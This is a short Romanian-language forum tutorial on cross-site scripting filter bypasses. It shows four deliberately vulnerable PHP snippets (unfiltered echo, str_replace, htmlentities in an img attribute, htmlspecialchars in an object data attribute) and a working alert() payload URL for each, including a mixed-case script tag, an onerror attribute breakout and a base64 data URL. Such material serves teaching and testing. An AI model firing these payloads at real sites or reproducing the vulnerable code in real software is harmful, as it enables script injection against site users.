Putin despre XSS

[Corex]

In acest tutorial va voi arata 4 tipuri de bypasuri XSS si cam cum arata scriptul in spate.

Sa inepem !

Fara Filtru.

Varianta fara filtru nu prea iti da batai de cap deoarece se introduce direct vectorul <script>alert(/xss/)</script>

Cum apare acest tip de xss? Pur si simplu afiseaza toate informatiile care sunt trecute prin GET

codu din spate arata cam asa

<?php
$functie =($_GET ['xss']);
echo ("$functie ")
?>

Ca sa afisezi alerta XSS vei face asa

www.white-hackers.com/xss1.php?xss=<script>alert(2)</script>

Bypass basic folosinduse de filtrul str_replace()

Aceasta functie cauta un sir specificat (in cazul nostru) <script> si il modifica (in cazul nostru NULL)

Haide sa vedeti si cum arata codu sursa pentru acest tip de XSS

<?php
echo 'Rezultat '.str_replace('script', null, $_GET['xss']);
?>

Ca sa treci de acest filtru trebuie sa folosim un bypass (este foarte usor)

www.white-hackers.com/xss2.php?xss=<ScRiPt>alert(2)</ScRiPt>

XSS Filtru htmlentities()

htmlentities converteste toate functiile din HTML . Intr-un cuvant toate tagurile din HTML le traduce in HTML (nu afecteaza codul sursa)

Scriptul din spate o sa arate cam asa

<?php
echo "<img alt='' src='".htmlentities($_GET['xss'])."' />";
?>

Ca sa trecem de acest filtru trebuie sa continuam scriptul dar sa includem alerta

acest lucru se va face cam asa

www.white-hackers.com/xss3.php?xss=.' onerror='alert("XSS")

Filtru folosinduse de data URLs

Aceasta metoda este putin mai ciudata deoarece practic vom folosi datele URL care in cele mai multe cazuri sunt folosite pentru imagini pentru a le pastra ca si text intr-un HTML

Haide sa vedem cum arata codul sursa

<?php
echo '<object data="'.htmlspecialchars($_GET['xss']).'"></object>';
?>

Ca sa afisam alerta XSS trebuie sa ne folosim de data:text/html;base64

iar dupa vom cripta in base64 vectorul <script>alert(2)</script>

Deci va arata cam asa

www.white-hackers.com/xss4.php?xss=data:text/html;base64,PHNjcmlwdD5hbGVydCgiWFNTIik8L3NjcmlwdD4=

Edited March 25, 2014 by Corex